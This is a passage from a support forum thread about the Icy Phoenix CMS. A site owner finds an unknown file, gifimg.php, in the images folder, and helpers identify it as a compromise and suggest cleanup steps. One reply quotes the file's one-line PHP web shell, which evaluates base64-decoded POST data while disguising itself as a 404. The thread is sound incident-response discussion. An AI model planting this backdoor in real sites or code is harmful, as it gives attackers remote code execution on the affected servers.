Did you check your cookie?

____________
Luca
SEARCH is the quickest way to get support.
Icy Phoenix ColorizeIt - CustomIcy - HON

Mighty Gorgon wrote: [View Post]

Did you check your cookie?

Yes, it seems that someone is infected or at least the PC is infected ... antivirus knows someone who could fix the problem.    

Hello.

State reviewing and within the images folder, I found a strange file that never was, it is: gifimg.php

In which your code is as follows ...





I hope I can help. Thanks

Definitely, someone exploited your files...

That code means... So this just gets some code through POST vars and executes it.

Try this: edit that file and replace all it's code with Then give that file read-only permissions (644).

It's not a definitive solution, but it might avoid the virus from appearing again.

Then check your files to see if you can find gifimg on it's content, or some base64_decode functions...
I suggest you to check common.php, includes/constants.php, includes/page_header.php..

____________
Gabriel Anca

KasLimon wrote: [View Post]

Definitely, someone exploited your files...

That code means...

Code: [Download] [Hide] [Select]

Code: [Download] [Show]

if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');

So this just gets some code through POST vars and executes it.

Try this: edit that file and replace all it's code with

Code: [Download] [Hide] [Select]

Code: [Download] [Show]

<?php
die();
?>

Then give that file read-only permissions (644).

It's not a definitive solution, but it might avoid the virus from appearing again.

Then check your files to see if you can find gifimg on it's content, or some base64_decode functions...
I suggest you to check common.php, includes/constants.php, includes/page_header.php..

It the hacker is smart engough could have cloacked the file name, so check also for any eval fuction on all the website code.

BTW, this could be a bug in icy on in any other software you have....